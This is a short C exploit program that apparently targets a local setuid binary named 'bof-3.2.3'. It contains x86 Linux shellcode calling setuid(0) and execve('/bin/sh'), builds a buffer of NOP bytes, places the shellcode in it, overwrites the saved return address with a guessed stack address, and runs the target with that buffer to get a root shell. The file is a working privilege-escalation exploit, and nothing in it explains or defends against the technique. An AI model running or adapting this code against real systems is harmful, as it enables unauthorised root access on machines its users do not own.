#include<string.h>
#define	BUFFSIZE	1040

char nitrous_sc[]=
                /* setuid(0) */
                "\xeb\x1a"              //jmp   $0x1a
                "\x31\xdb"              //xorl  %ebx,%ebx
                "\xb0\x17"              //movb  $0x17,%al
                "\xcd\x80"              //int   $0x80
                /* execve("/bin/sh",{"/bin/sh",NULL},NULL) */
                "\x5b"                  //popl  %ebx
                "\x31\xd2"              //xorl  %edx,%edx
                "\x88\x53\x07"          //movb  %dl,0x7(%ebx)
                "\x89\x5b\x08"          //movl  %ebx,0x8(%ebx)
                "\x89\x53\x0c"          //movl  %edx,0xc(%ebx)
                "\x8d\x4b\x08"          //leal  0x8(%ebx),%ecx
                "\x6a\x0b"              //pushl $0xb
                "\x58"                  //popl  %eax
                "\xcd\x80"              //int   $0x80
                "\xe8\xe1\xff\xff\xff"  //call  -0x1f
                "/bin/sh";              //.string "/bin/sh"

unsigned long get_esp(void)
{
	__asm__("movl %esp,%eax");
}

main(int argc, char **argv)
{
	char *b00f=(char *)malloc(BUFFSIZE);
	unsigned long ret00rn=(argc>1)?(0xbffffffa-atoi(argv[1])):get_esp();

	memset(b00f,0x90,BUFFSIZE);
	memcpy(b00f+BUFFSIZE-strlen(nitrous_sc)-4,nitrous_sc,strlen(nitrous_sc));
	*(unsigned long *)&b00f[BUFFSIZE-4]=ret00rn;

	execl("./bof-3.2.3","bof-3.2.3",b00f,NULL);
}